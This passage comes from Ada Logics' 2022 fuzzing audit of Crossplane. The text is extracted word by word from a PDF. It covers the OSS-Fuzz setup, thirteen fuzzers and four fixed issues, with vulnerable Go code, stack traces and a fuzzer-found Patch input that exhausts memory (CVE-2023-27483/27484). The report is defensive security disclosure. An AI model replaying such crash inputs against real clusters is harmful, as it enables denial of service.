m/google/oss-fuzz\n1Crossplane\nfuzzing\naudit\n2022\nEx ecutive\nsummary\nIn\nJuly\n2022,\nAda\nLogics\nstarted\na\nfuzzing\naudit\nof\nCrossplane.\nThe\ngoal\nof\nthe\naudit\nwas\nto\nimprove\nCrossplanes\nfuzzing\nefforts.\nAt\nthe\ntime\nthe\naudit\nstarted,\nCrossplane\nhad\nnot\ndone\nany\nprior\nfuzz\ntesting,\nand\nthe\naudit\nbegan\nwith\nintegrating\nCrossplane\ninto\nOSS-Fuzz\n-\nGoogles\nopen\nsource\nproject\nthat\nruns\nthe\nfuzzers\nof\ncritical\nopen\nsource\nprojects\nand\nreports\nissues\nto\nmaintainers\nif\nthe\nfuzzers\ndetect\nany.\nOnce\nCrossplane\nwas\nintegrated\ninto\nOSS-Fuzz,\nAda\nLogics\nbegan\nassessing\nCrossplanes\ncode\nbase\nto\ndetermine\nwhich\nentrypoints\nthe\nfuzzers\nshould\ntarget.\nIn\ntotal\nthree\ncode\nassets\nwere\ntested\nin\nthis\naudit:\nhttps://github.com/crossplane/crossplane:\nThe\ncore\nCrossplane\nrepository.\nhttps://github.com/crossplane/crossplane-runtime:\nA\nset\nof\ngo\nlibraries\nused\nto\nbuild\ncontrollers\nin\nthe\nCrossplane\nstack.\ngithub.com/google/go-containerregistry:\nA\n3rd-party\ndependency\nthat\nhandles \ncomplex\nparsing\nfor\nCrossplane\nAll\nfuzzers\nwere\nmerged\ninto\nthe\ncncf-fuzzing\nrepository,\nhttps://github.com/cncf/cncf-fuzzing\n,\nfrom\nwhich\nOSS-Fuzz\nwould\npull\nthem\nand\ntest\nagainst\nthe\nlatest\nmaster\nbranches\nof\nthe\nthree\nrepositories\nbeing\ntested.\nAda\nLogics\ncreated\na\nPR\nfor\nCI\nintegration,\nso\nthat\nthe\nfuzzers\ncan\ntest\nnew\ncode\ncontributions\nto\nCrossplane:\nhttps://github.com/crossplane/crossplane/pull/3553\n.\nThe\naudit\nfound\n4\nissues:\n2\nin\nCrossplane\nand\n2\nin\n3rd-party\ndependencies.\nResults\nsummarised\n13\nfuzzers\nwritten\nfor\nCrossplane\n4\nissues\nfound\nAll\nfuzzers\nintegrated\ninto\nOSS-Fuzz\n2\nsecurity\nvulnerabilities\nfound\nby\nthe\nfuzzers\nFuzzers\nsupported\nby\nCrossplanes\nCI\n2Crossplane\nfuzzing\naudit\n2022\nT able\nof\nContents\nCNCF\nsecurity\nand\nfuzzing\naudits\n1\nExecutive\nsummary\n2\nTable\nof\nContents\n3\nProject\nSummary\n4\nCrossplane\nfuzzing\n5\nIssues\nfound\nby\nfuzzers\n10\nRuntime\nstats\n19\nConclusions\nand\nfuture\nwork\n20\n3Crossplane\nfuzzing\naudit\n2022\nP r o j e c t\nS u m m a r y\nAda\nLogics\nauditors\nName\nTitle\nEmail\nAdam\nKorczynski\nSecurity\nEngineer\nAdam@adalogics.com\nDavid\nKorczynski\nSecurity\nResearcher\nDavid@adalogics.com\nCrossplane\nmaintainers\ninvolved\nin\nthe\naudit\nName\nTitle\nEmail\nPhilippe\nScorsolini\nSenior\nSo\u0000ware\nEngineer\nphilippe.scorsolini@upbound.io\nJared\nWatts\nSteering\nCommittee\nand \nCrossplane\nMaintainer\njared@upbound.io\nAlper\nUlucinar\nStaff\nSo\u0000ware\nEngineer\nalper@upbound.io\nNic\nCope\nCrossplane\nSteering \nCommittee\nnegz@upbound.io\nAssets\nUrl\nBranch\nhttps://github.com/crossplane/crossplanemaster\nhttps://github.com/crossplane/crossplane-runtimemaster\nhttps://github.com/google/go-containerregistrymain\n4Crossplane\nfuzzing\naudit\n2022\nCrossplane\nfuzzing\nIn\nthis\nsection\nwe\npresent\ndetails\non\nCrossplaneʼs\nfuzzing\nsetup,\nand\nin\nparticular\nthe\noverall\nfuzzing\narchitecture\nas\nwell\nas\nthe\nspecific\nfuzzers\ndeveloped.\nArchitecture\nA\ncentral\ncomponent\nin\nCrossplaneʼs\nfuzzing\nsuite\nis\ncontinuous\nfuzzing\nby\nway\nof\nOSS-Fuzz.\nCrossplaneʼs\nupstream\nsource\ntree\nis\nthe\nkey\nso\u0000ware\npackage\nthat\nOSS-Fuzz\nuses\nto\nfuzz\nCrossplane.\nThe\nfollowing\nfigure\ngives\nan\noverview\nof\nhow\nOSS-Fuzz\nuses\nCrossplaneʼs\nupstream\nrepository\nand\nwhat\nhappens\nwhen\nan\nissue\nis\nfound/fixed.\nFigure0.1:Crossplane’sfuzzingarchitecture\n5\nCrossplane\nfuzzing\naudit\n2022\nThe\ncurrent\nOSS-Fuzz\nsetup\nbuilds\nthe\nfuzzers\nby\ncloning\nthe\nupstream\nCrossplane\nGithub\nrepository\nto\nget\nthe\nlatest\nCrossplane\nsource\ncode\nand\nthen\nbuilds\nthe\nfuzzers\nin\nthe\ncloned\nCrossplane\nsource\ntree.\nAs\nsuch,\nthe\nfuzzers\nare\nalways\nrun\nagainst\nthe\nlatest\nCrossplane\ncommit.\nThis\nbuild\ncycle\nhappens\ndaily\nand\nOSS-Fuzz\nwill\nverify\nif\nany\nexisting\nbugs\nhave\nbeen\nfixed.\nIf\nOSS-fuzz\nfinds\nthat\nany\nbugs\nhave\nbeen\nfixed,\nOSS-Fuzz\nmarks\nthe\ncrashes\nas\nfixed\nin\nthe\nMonorail\nbug\ntracker\nand\nnotifies\nthe\nCrossplane\nmaintainers.\nIn\neach\nfuzzing\niteration,\nOSS-Fuzz\nuses\nits\ncorpus\naccumulated\nfrom\nprevious\nfuzz\nruns.\nIf\nOSS-Fuzz\ndetects\nany\ncrashes\nwhen\nrunning\nthe\nfuzzers,\nOSS-Fuzz\nperforms\nthe\nfollowing\nactions:\n1.\nA\ndetailed\ncrash\nreport\nis\ncreated.\n2.\nAn\nissue\nin\nthe\nbug\ntracker\nis\ncreated.\n3.\nAn\nemail\nis\nsent\nto\nmaintainers\nwith\nlinks\nto\nthe\nreport\nand\nrelevant\nentry\nin\nthe\nbug\ntracker.\nOSS-Fuzz\nhas\na\n90\nday\ndisclosure\npolicy,\nmeaning\nthat\na\nbug\nbecomes\npublic\nin\nthe\nbug\ntracker\nif\nit\nhas\nnot\nbeen\nfixed.\nThe\ndetailed\nreport\nis\nnever\nmade\npublic.\nThe\nCrossplane\nmaintainers\nwill\nfix\nissues\nupstream,\nand\nOSS-Fuzz\nwill\npull\nthe\nlatest\nCrossplane\nmaster\nbranch\nthe\nnext\ntime\nit\nperforms\na\nfuzz\nrun\nand\nverify\nthat\na\ngiven\nissue\nhas\nbeen\nfixed.\nFuzzers\nAda\nLogics\nwrote\n13\nfuzzers\nduring\nthe\nfuzzing\naudit.\nIn\nthis\nsection\nwe\npresent\na\nhighlight\nof\nthe\nfuzzers\nand\nwhich\nparts\nof\nCrossplane\nthey\ntest.\nO v e r v i e w\n#\nName\nPackage\n1FuzzPatchApplygithub.com/crossplane/crossplane/internal/controller/apiextensions/composite\n2FuzzTransformgithub.com/crossplane/crossplane/internal/controller/apiextensions/composite\n3FuzzParsegithub.com/crossplane/crossplane/internal/xpkg\n4FuzzPropagateConnectiongithub.com/crossplane/crossplane/internal/controller/apiextensions/claim\n5FuzzNewCompositionRevisiongithub.com/crossplane/crossplane/internal/controller/apiextensions/composition\n6FuzzAsCompositiongithub.com/crossplane/crossplane/internal/controller/apiextensions/composite\n7FuzzPackageRevisiongithub.com/crossplane/crossplane/internal/controller/pkg/manager\n8FuzzGCRExtract*github.com/crossplane/crossplane/internal/controller/pkg/revision\n6Crossplane\nfuzzing\naudit\n2022\n9FuzzParseReference*github.com/crossplane/crossplane/internal/controller/pkg/revision\n10FuzzForCompositeResourceXcrdgithub.com/crossplane/crossplane/internal/xcrd\n11FuzzForCompositeResourceClaimgithub.com/crossplane/crossplane/internal/xcrd\n12FuzzFindXpkgInDirgithub.com/crossplane/crossplane/internal/xpkg\n13FuzzDaggithub.com/crossplane/crossplane/internal/dag\n*\nRemoved\na\u0000er\nthe\naudit.\nT a r g e t\nA P I s\n1 :\nF u z z P a t c h A p p l y\nInvokesgithub.com/crossplane/crossplane/internal/controller/apiextensions/composite.Apply()\nwith\na\npseudo-randomizedPatch\nand\ntwo\nmocked\ntypes\nasComposite\nandComposed\nrespectively.\n2 :\nF u z z T r a n s f o r m\nCreates\na\npseudo-randomizedgithub.com/crossplane/crossplane/apis/apiextensions/v1.Transform\nand\npasses\nit\ntogithub.com/crossplane/crossplane/internal/controller/apiextensions/composite.Resolve()\ntogether\nwith\na\npseudo-random\nstring\nas\nthe\nsecond\nparameter.\n3 :\nF u z z P a r s e\nTests\nthe\nCrossplane\nRuntime\nparser\nwith\naNopCloser\ncontaining\nthe\ntestcase\nfrom\nthe\nfuzzer.\n4 :\nF u z z P r o p a g a t e C o n n e c t i o n\nTestsgithub.com/crossplane/crossplane/internal/controller/apiextensions/claim.(a*APIConnectionPropagator).PropagateConnection()\n.\nThe\nfuzzer\ncreates\nanAPIConnectionPropagator\nwith\na\nmock\nclient\nand\ninvokes\nitsPropagateConnection()\nmethod\nwith\na\npseudo-randomizedComposite\nandComposed\n.\n5 :\nF u z z N e w C o m p o s i t i o n R e v i s i o n\nInvokesgithub.com/crossplane/crossplane/internal/controller/apiextensions/composition.NewCompositionRevision()\nwith\npseudo-randomizedrevision\nandcompSpecHash\nparameters.\n6 :\nF u z z A s C o m p o s i t i o n\nRandomizes\nagithub.com/crossplane/crossplane/apis/apiextensions/v1beta1.CompositionRevision\nand\npasses\nit\nto\n7Crossplane\nfuzzing\naudit\n2022\ngithub.com/crossplane/crossplane/internal/controller/apiextensions/composite.AsComposition()\n.\n7 :\nF u z z P a c k a g e R e v i s i o n\nHas\ntwo\ntargets:github.com/crossplane/crossplane/internal/controller/pkg/manager.(r*PackageRevisioner).Revision()\nandgithub.com/crossplane/crossplane/internal/xpkg.FriendlyID()\n.\nTo\ninvokeRevision()\n,\nthe\nfuzzer\ncreates\na*PackageRevisioner\nwith\na\nmock\nfetcher.\nIt\nthen\ninvokesRevision()\nwith\na\npseudo-randomizedgithub.com/crossplane/crossplane/apis/pkg/v1.Provider\n.\nA\u0000er\nthat,\nthe\nfuzzer\nproceeds\nto\ncreating\ntwo\nstrings\nand\npassing\nthem\nontoFriendlyID()\n.\n8 :\nF u z z G C R E x t r a c t *\nTests\nthe\n3rd-party\nAPI\nused\nby\nCrossplane:github.com/google/go-containerregistry/pkg/v1/mutate.Extract()\n.\nThe\nfuzzer\ncreates\na\ntar\nfile\nthat\nit\nthen\npasses\nto\nthe\ntarget\nAPI\nto\nbe\nextracted.\n9 :\nF u z z P a r s e R e f e r e n c e *\nTests\nthe\n3rd-party\nAPI\nused\nby\nCrossplane:github.com/google/go-containerregistry/pkg/name.ParseReference()\n.\nThe\ntestcase\nfrom\nthe\nfuzzer\nis\npassed\nto\nthe\ntarget\nAPI.\n1 0 :\nF u z z F o r C o m p o s i t e R e s o u r c e X c r d\nTestsgithub.com/crossplane/crossplane/internal/xcrd.ForCompositeResourceXcrd()\nby\ncreating\na\npseudo-randomgithub.com/crossplane/crossplane/apis/apiextensions/v1.CompositeResourceDefinition\nand\npassing\nit\nto\nthe\ntarget\nAPI.\n1 1 :\nF u z z F o r C o m p o s i t e R e s o u r c e C l a i m\nTestsgithub.com/crossplane/crossplane/internal/xcrd.FuzzForCompositeResourceClaim()\nby\ncreating\na\npseudo-randomgithub.com/crossplane/crossplane/apis/apiextensions/v1.CompositeResourceDefinition\nand\npassing\nit\nto\nthe\ntarget\nAPI.\n1 2 :\nF u z z F i n d X p k g I n D i r\nThe\ngoal\nof\nthis\nfuzzer\nis\nto\ntestgithub.com/crossplane/crossplane/internal/xpkg.FindXpkgInDir()\nandgithub.com/crossplane/crossplane/internal/xpkg.ParseNameFromMeta()\n.\nThe\nfuzzer\nprepares\nagithub.com/spf13/afero.MemMapFs\nand\ncreates\npseudo-random\nfiles\nin\nit.\nTheMemMapFs\nis\nthen\npassed\nto\nthe\ntwo\ntarget\nAPIs\nas\nthe\nfirst\nargument\nand“/”\nas\nthe\nsecond.\n8Crossplane\nfuzzing\naudit\n2022\n1 3 :\nF u z z D a g\nTestsMapDag\ninitialization\nby\ncreating\na\nslice\nof\npseudo-random\nnodes\nand\npassing\nit\ntogithub.com/crossplane/crossplane/internal/dag.(d*MapDag).Init()\n.\n*\nRemoved\na\u0000er\nthe\naudit.\n9Crossplane\nfuzzing\naudit\n2022\nIssues\nfound\nby\nfuzzers\nThe\naudit\nresulted\nin\n4\nunique\nissues.\nSome\nof\nthese\nwere\nreported\nwith\nmultiple\nsimilar\ncrashes\nby\nOSS-Fuzz.\nThis\nhappens\nfor\nseveral\nreasons:\nFor\nexample,\nchanges\nin\nCrossplane\nmeant\nthat\na\ncrash\nwas\nmoved\nfrom\none\nplace\nto\nanother\nin\nthe\ncodebase\ncausing\na\ntestcase\nto\nbe\ninvalid\nand\na\nnew\none\nto\nbe\nvalid.\nAda\nLogics\nassessed\nall\ncrashes\nreported\nby\nOSS-Fuzz\nand\nhave\nonly\nincluded\nthe\nunique\nones\nin\nthis\nreport.\n#\nID\nTitle\nSeverity\nFixed\n1\nADA-CROSS-FUZZ-1\nUser-controlled\nvariable\ndetermines\nslice\nsize\nHigh\nYes\n2\nADA-CROSS-FUZZ-2\nruntime.DefaultUnstructuredConverter.ToUnstructur \ned\npanics\nif\nif\na\npointer-typed\nfield\nwithout \nomitempty\nspecifier\nis\nattempted\nto\nbe\nconverted\nModerate\nYes\n3\nADA-CROSS-FUZZ-3\nMissing\nslice\nlength\nchecks\ncauses\nout\nof\nbounds \nread\nLow\nYes\n4\nADA-CROSS-FUZZ-4\nTime\nout\nin\n3rd-party\ndependency\nModerate\nYes\nThe\nmost\ninteresting\nfinding\nwas\nADA-CROSS-FUZZ-1\nwhich\nwas\na\nbug\nthat\nallowed\npartially-trusted\nusers\nto\ncontrol\nthe\nsize\nof\nallocated\nmemory\nof\nthe\nnode\nwithout\nan\nupper\nlimit.\nThe\nissue\nwas\ntriaged\nby\nthe\nCrossplane\nmaintainers\nand\nwas\nassigned\nassigned\nCVEʼs\nin\nboth\nCrossplane\nand\nCrossplane-runtime:\nProject\nGithub\nAdvisory\nCVE\nCrossplane\nGHSA-v829-x6hh-cqfq\nCVE-2023-27484\nCrossplane-runtime\nGHSA-vfvj-3m3g-m532\nCVE-2023-27483\n10Crossplane\nfuzzing\naudit\n2022\n1 :\nU s e r - c o n t r o l l e d\nv a r i a b l e\nd e t e r m i n e s\ns l i c e\ns i z e\nID\nADA-CROSS-FUZZ-1\nSeverity\nHigh\nFixed\nYes\nFuzzerFuzzPatchApply\nOSS-Fuzz\nbug\ntracker:\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=49338&q=crossplane&can=1 \n(expired)\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=53819&q=crossplane&can=1\nDescription\nCrossplane\nruntime\nattempts\nto\ncreate\na\nslice\nthat\nis\nlarger\nthan\nthe\nmemory\navailable.\nThe\nsize\nof\nthe\nslice\nis\ndetermined\nby\ninput\ncontrolled\nby\nthe\nfuzzer.\nThe\nCrossplane\nteam\ntriaged\nthe\nissue\nand\nfound\nthat\nit\nwas\nsecurity-critical\nand\nimpacted\nboth\nCrossplane\nand\nCrossplane-runtime.\nThey\nrequested\nCVEʼs\nfor\nboth\nprojects:\nProject\nGithub\nAdvisory\nCVE\nCrossplane\nGHSA-v829-x6hh-cqfq\nCVE-2023-27484\nCrossplane-runtime\nGHSA-vfvj-3m3g-m532\nCVE-2023-27483\nThis\nissue\nexisted\nin\ntwo\nplaces\nin\nhttps://github.com/crossplane/crossplane-runtime/blob/master/pkg/fieldpath/paved.go\nhighlighted\nbelow:\nfuncprepareElement(array[]any,current,nextSegment){//Ifthissegmentisnotthefinaloneanddoesn'texistweneedto//createitforournextsegment.ifarray[current.Index]==nil{switchnext.Type{caseSegmentIndex:array[current.Index]=make([]any,next.Index+1)caseSegmentField:array[current.Index]=make(map[string]any)}return}\n//Ifournextsegmentindexesanarraythatexistsinourcurrentsegment's//elementwemustensurethearrayislongenoughtosetthenextsegment.ifnext.Type!=SegmentIndex{return\n11Crossplane\nfuzzing\naudit\n2022\n}\nna,ok:=array[current.Index].([]any)if!ok{return}\nifint(next.Index)<len(na){return}\narray[current.Index]=append(na,make([]any,int(next.Index)-len(na)+1)...)}\nfuncprepareField(objectmap[string]any,current,nextSegment){//Ifthissegmentisnotthefinaloneanddoesn'texistweneedto//createitforournextsegment.if_,ok:=object[current.Field];!ok{switchnext.Type{caseSegmentIndex:object[current.Field]=make([]any,next.Index+1)caseSegmentField:object[current.Field]=make(map[string]any)}return}\n//Ifournextsegmentindexesanarraythatexistsinourcurrentsegment's//fieldwemustensurethearrayislongenoughtosetthenextsegment.ifnext.Type!=SegmentIndex{return}\nna,ok:=object[current.Field].([]any)if!ok{return}\nifint(next.Index)<len(na){return}\nobject[current.Field]=append(na,make([]any,int(next.Index)-len(na)+1)...)}\nStack\ntrace\nfatal\nerror:\nruntime:\nout\nof\nmemory\nruntime\nstack:\nruntime.throw({0x26766c4?,\n0x2430?})\nruntime/panic.go:1047\n+0x5f\nfp=0x7ffe30995c50\nsp=0x7ffe30995c20\npc=0x5a4edf\nruntime.sysMapOS(0x10c001400000,\n0x472800000?)\nruntime/mem_linux.go:187\n+0x11b\nfp=0x7ffe30995c98\nsp=0x7ffe30995c50\npc=0x586adb\nruntime.sysMap(0x3fdfca0?,\n0x7ff0e0300000?,\n0x599fa0?)\nruntime/mem.go:142\n+0x35\nfp=0x7ffe30995cc8\nsp=0x7ffe30995c98\npc=0x5864b5\n12Crossplane\nfuzzing\naudit\n2022\nruntime.(*mheap).grow(0x3fdfca0,\n0x239374?)\nruntime/mheap.go:1459\n+0x23d\nfp=0x7ffe30995d38\nsp=0x7ffe30995cc8\npc=0x59705d\nruntime.(*mheap).allocSpan(0x3fdfca0,\n0x239374,\n0x0,\n0x0)\nruntime/mheap.go:1 191\n+0x1be\nfp=0x7ffe30995dd0\nsp=0x7ffe30995d38\npc=0x59679e\nruntime.(*mheap).alloc.func1()\nruntime/mheap.go:910\n+0x65\nfp=0x7ffe30995e18\nsp=0x7ffe30995dd0\npc=0x596225\nruntime.systemstack()\nruntime/asm_amd64.s:492\n+0x46\nfp=0x7ffe30995e20\nsp=0x7ffe30995e18\npc=0x5d3266\ngoroutine\n17\n[running,\nlocked\nto\nthread]:\nruntime.systemstack_switch()\nruntime/asm_amd64.s:459\nfp=0x10c000da3628\nsp=0x10c000da3620\npc=0x5d3200\nruntime.(*mheap).alloc(0x4726e8000?,\n0x239374?,\n0x0?)\nruntime/mheap.go:904\n+0x65\nfp=0x10c000da3670\nsp=0x10c000da3628\npc=0x596165\nruntime.(*mcache).allocLarge(0x455960?,\n0x4726e7120,\n0x0)\nruntime/mcache.go:233\n+0x85\nfp=0x10c000da36c0\nsp=0x10c000da3670\npc=0x585445\nruntime.mallocgc(0x4726e7120,\n0x29c9420,\n0x1)\nruntime/malloc.go:1029\n+0x57e\nfp=0x10c000da3738\nsp=0x10c000da36c0\npc=0x57b69e\nruntime.makeslice(0x29df3a0?,\n0x10c000b4f590?,\n0x10c000b38900?)\nruntime/slice.go:103\n+0x52\nfp=0x10c000da3760\nsp=0x10c000da3738\npc=0x5bb912\ngithub.com/crossplane/crossplane-runtime/pkg/fieldpath.prepareField(0x10c000b5e1f8?,\n{0x4?,\n{0x10c000b38900?,\n0x2951920?},\n0x10c000b50fa0?},\n{0x10c000da3930?,\n{0x0?,\n0x5742d8?},\n0x10c000c0c1e0?})\ngithub.com/crossplane/crossplane-runtime@v0.19.0-rc.0.0.20221 114195150-65044f043902/pkg/fieldpath/pav\ned.go:426\n+0x59e\nfp=0x10c000da3808\nsp=0x10c000da3760\npc=0x25f7f3e\ngithub.com/crossplane/crossplane-runtime/pkg/fieldpath.(*Paved).setV alue(0x10c0004acd60,\n{0x10c000497180,\n0x3,\n0x4},\n{0x0,\n0x0})\ngithub.com/crossplane/crossplane-runtime@v0.19.0-rc.0.0.20221 114195150-65044f043902/pkg/fieldpath/pav\ned.go:381\n+0x6a5\nfp=0x10c000da3970\nsp=0x10c000da3808\npc=0x25f6de5\ngithub.com/crossplane/crossplane-runtime/pkg/fieldpath.(*Paved).SetV alue(0x0?,\n{0x10c000b38900,\n0x60},\n{0x0,\n0x0})\ngithub.com/crossplane/crossplane-runtime@v0.19.0-rc.0.0.20221 114195150-65044f043902/pkg/fieldpath/pav\ned.go:457\n+0x1a5\nfp=0x10c000da39f8\nsp=0x10c000da3970\npc=0x25f8205\ngithub.com/crossplane/crossplane-runtime/pkg/fieldpath.(*Paved).MergeV alue(0x2b73cb0?,\n{0x10c000b38900,\n0x60},\n{0x0,\n0x0},\n0x0)\ngithub.com/crossplane/crossplane-runtime@v0.19.0-rc.0.0.20221 114195150-65044f043902/pkg/fieldpath/mer\nge.go:47\n+0x2eb\nfp=0x10c000da3a60\nsp=0x10c000da39f8\npc=0x25f2a8b\ngithub.com/crossplane/crossplane/internal/controller/apiextensions/composite.patchFieldV alueToObject({0x10\nc000b38900,\n0x60},\n{0x0,\n0x0},\n{0x2b73cb0?,\n0x10c000b58ea0},\n0x0?)\ngithub.com/crossplane/crossplane/internal/controller/apiextensions/composite/merge.go:96\n+0x152\nfp=0x10c000da3ad8\nsp=0x10c000da3a60\npc=0x261e3b2\ngithub.com/crossplane/crossplane/internal/controller/apiextensions/composite.ApplyFromFieldPathPatch({{0x2\n675bf0,\n0x16},\n0x10c000b50d40,\n0x10c000b4f290,\n0x10c000b50d60,\n0x10c000b50d70,\n{0x0,\n0x0,\n0x0},\n0\nx0},\n...)\ngithub.com/crossplane/crossplane/internal/controller/apiextensions/composite/patches.go:194\n+0x62c\nfp=0x10c000da3bc0\nsp=0x10c000da3ad8\npc=0x261f f8c\ngithub.com/crossplane/crossplane/internal/controller/apiextensions/composite.ApplyT oObjects({{0x2675bf0,\n0x16},\n0x10c000b50d40,\n0x10c000b4f290,\n0x10c000b50d60,\n0x10c000b50d70,\n{0x0,\n0x0,\n0x0},\n0x0},\n...)\ngithub.com/crossplane/crossplane/internal/controller/apiextensions/composite/patches.go:85\n+0xa38\nfp=0x10c000da3cd8\nsp=0x10c000da3bc0\npc=0x261ef98\ngithub.com/crossplane/crossplane/internal/controller/apiextensions/composite.Apply(...)\ngithub.com/crossplane/crossplane/internal/controller/apiextensions/composite/patches.go:71\n13Crossplane\nfuzzing\naudit\n2022\ngithub.com/crossplane/crossplane/internal/controller/apiextensions/composite.FuzzPatchApply({0x60f0000231\nd0,\n0xa9,\n0xa9})\nParameters\nThe\nthree\nparameters\npassed\nto\nApply\nare:\nP a t c h\n{\"type\":\"FromCompositeFieldPath\",\"fromFieldPath\":\"\",\"combine\":{\"variables\":[],\"strategy\":\"\",\"string\":{\"fmt\":\"\"}},\"toFieldPath\":\"\\u0000\\u0004\\u0000\\ufffdB\\ufffd\\ufffd\\ufffdterface\\u0000\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000`\\u0000\\u0000\\u0000\\u0000**X[000000000000000001193731857]i\\u0000\\u0001\\u001a\\tn\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\t\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000tefac\",\"patchSetName\":\"\"}\nC o m p o s i t e\n{\"creationTimestamp\":null,\"Policy\":null,\"To\":null}\nC o m p o s e d\n{\"creationTimestamp\":null,\"Ref\":null,\"To\":null}\n14Crossplane\nfuzzing\naudit\n2022\n2 :\nr u n t i m e . D e f a u l t U n s t r u c t u r e d C o n v e r t e r . T o U n s t r u c t u r e d\np a n i c s\ni f\ni f\na\np o i n t e r - t y p e d\nfi e l d\nw i t h o u t\no m i t e m p t y\ns p e c i fi e r\ni s\na t t e m p t e d\nt o\nb e\nc o n v e r t e d\nID\nADA-CROSS-FUZZ-2\nSeverity\nModerate\nFixed\nYes\nFuzzerFuzzPatchApply\nOSS-Fuzz\nbug\ntracker:\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50987\nDescription\nTheFuzzPatchApply\nfuzzer\nfound\nthat\nifresource.Composite\nwith\na\nnil\nconnection\ndetails\nlast\npublished\ntime\ntoPatch.Apply\n,\nsubsequent\ncalls\ntoruntime.DefaultUnstructuredConverter.ToUnstructured\nto\nconvert\nit\nto\nanunstructured.Unstructured\nwill\npanic.\nThe\nissue\nhas\nbeen\nfixed\nin\nCrossplane\nhere:\nhttps://github.com/crossplane/crossplane/pull/3394\nand\nhere:\nhttps://github.com/crossplane/crossplane-runtime/pull/361\n,\nand\nan\nupstream\nPR\nhas\nbeen\ncreated\nhere:\nhttps://github.com/kubernetes-sigs/structured-merge-diff/issues/229\n.\nCredit\nto\nAlper\nRifat\nUlucinar\nfor\nhis\nwork\non\ntriaging\nthis\nissue.\nStack\ntrace\npanic:\nvalue\nmethod\nk8s.io/apimachinery/pkg/apis/meta/v1.T ime.ToUnstructured\ncalled\nusing\nnil\n*Time\npointer \ngoroutine\n17\n[running,\nlocked\nto\nthread]: \nk8s.io/apimachinery/pkg/apis/meta/v1.(*T ime).ToUnstructured(0x100000001?) \n <autogenerated>:1\n+0x71 \nsigs.k8s.io/structured-merge-dif f/v4/value.T ypeReflectCacheEntry .ToUnstructured({0x1,\n0x0,\n0x0,\n0x0,\n0x1, \n0x0,\n0x0,\n{0x0,\n0x0,\n0x0}},\n...) \n sigs.k8s.io/structured-merge-dif f/v4@v4.2.1/value/reflectcache.go:188\n+0xa9a \nk8s.io/apimachinery/pkg/runtime.toUnstructured({0x1f3c540?,\n0x10c00013b4e0?,\n0x0?},\n{0x1da6580?, \n0x10c0002b85b0?,\n0x0?}) \n k8s.io/apimachinery@v0.24.0/pkg/runtime/converter .go:655\n+0x19a \nk8s.io/apimachinery/pkg/runtime.structT oUnstructured({0x1de9c00?,\n0x10c00013b4e0?,\n0x6305b0?}, \n{0x1da6580?,\n0x10c0002b8570?,\n0x10c000017668?}) \n k8s.io/apimachinery@v0.24.0/pkg/runtime/converter .go:843\n+0xb91 \nk8s.io/apimachinery/pkg/runtime.toUnstructured({0x1de9c00?,\n0x10c00013b4e0?,\n0xa?},\n{0x1da6580?, \n0x10c0002b8570?,\n0x98?}) \n k8s.io/apimachinery@v0.24.0/pkg/runtime/converter .go:692\n+0x119f \nk8s.io/apimachinery/pkg/runtime.structT oUnstructured({0x1edae00?,\n0x10c00013b380?,\n0x1005c85e5?}, \n{0x1dbbe40?,\n0x10c00012c688?,\n0x0?}) \n k8s.io/apimachinery@v0.24.0/pkg/runtime/converter .go:843\n+0xb91 \nk8s.io/apimachinery/pkg/runtime.toUnstructured({0x1edae00?,\n0x10c00013b380?,\n0x10c00013b380?}, \n{0x1dbbe40?,\n0x10c00012c688?,\n0x7f89fe5604d0?})\n15Crossplane\nfuzzing\naudit\n2022\n k8s.io/apimachinery@v0.24.0/pkg/runtime/converter .go:692\n+0x119f \nk8s.io/apimachinery/pkg/runtime.(*unstructuredConverter).T oUnstructured(0x3337830,\n{0x1f3acc0?, \n0x10c00013b380})\n k8s.io/apimachinery@v0.24.0/pkg/runtime/converter .go:586\n+0x6f6 \ngithub.com/crossplane/crossplane-runtime/pkg/fieldpath.PaveObject({0x1f48288?,\n0x10c00013b380?}) \n github.com/crossplane/crossplane-runtime@v0.18.0-rc.0.0.20220722162506-9ea84ae53615/pkg/fieldpath/p\naved.go:55\n+0x52 \ngithub.com/crossplane/crossplane/apis/apiextensions/v1.patchFieldV alueToObject({0x0,\n0x0},\n{0x0,\n0x0}, \n{0x1f48288?,\n0x10c00013b380},\n0x0?) \n github.com/crossplane/crossplane/apis/apiextensions/v1/composition_patches.go:199\n+0x5d \ngithub.com/crossplane/crossplane/apis/apiextensions/v1.(*Patch).applyFromFieldPathPatch(0x10c00003d450,\n{0x1f48260?,\n0x10c0004677a0?},\n{0x1f48288,\n0x10c00013b380}) \n github.com/crossplane/crossplane/apis/apiextensions/v1/composition_patches.go:253\n+0x2e5 \ngithub.com/crossplane/crossplane/apis/apiextensions/v1.(*Patch).Apply(0x10c00003d450,\n{0x1f48260, \n0x10c0004677a0},\n{0x1f48288,\n0x10c00013b380},\n{0x0,\n0x0,\n0x0?}) \n github.com/crossplane/crossplane/apis/apiextensions/v1/composition_patches.go:129\n+0x4a5 \ngithub.com/crossplane/crossplane/apis/apiextensions/v1.FuzzPatchApply({0x603000001900,\n0x16,\n0x16}) \n github.com/crossplane/crossplane/apis/apiextensions/v1/patch_fuzzer .go:84\n+0x425\n16Crossplane\nfuzzing\naudit\n2022\n3 :\nM i s s i n g\ns l i c e\nl e n g t h\nc h e c k s\nc a u s e s\no u t\no f\nb o u n d s\nr e a d\nID\nADA-CROSS-FUZZ-3\nSeverity\nLow\nFixed\nYes\nFuzzerFuzzNewCompositionRevision\nOSS-Fuzz\nbug\ntracker:\n●\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=53815\nDescription\nNewCompositionRevision\nreads\nthe\nfirst\nbytes\nof\nthe\ncompSpecHash\nwithout\nchecking\nthe\nlength\nfirst.\nIf\nthe\ncompSpecHash\nis\ntoo\nshort,\nan\nout\nof\nbounds\nread\npanic\nwill\noccur:\nhttps://github.com/crossplane/crossplane/blob/8c77706ff8b180b3bb4cd43920a8afce85dfe312/int\nernal/controller/apiextensions/composition/revision.go#L31-L53\nfuncNewCompositionRevision(c*v1.Composition,revisionint64,compSpecHashstring)*v1beta1.CompositionRevision{cr:=&v1beta1.CompositionRevision{ObjectMeta:metav1.ObjectMeta{Name:fmt.Sprintf(\"%s-%s\",c.GetName(),compSpecHash[0:7]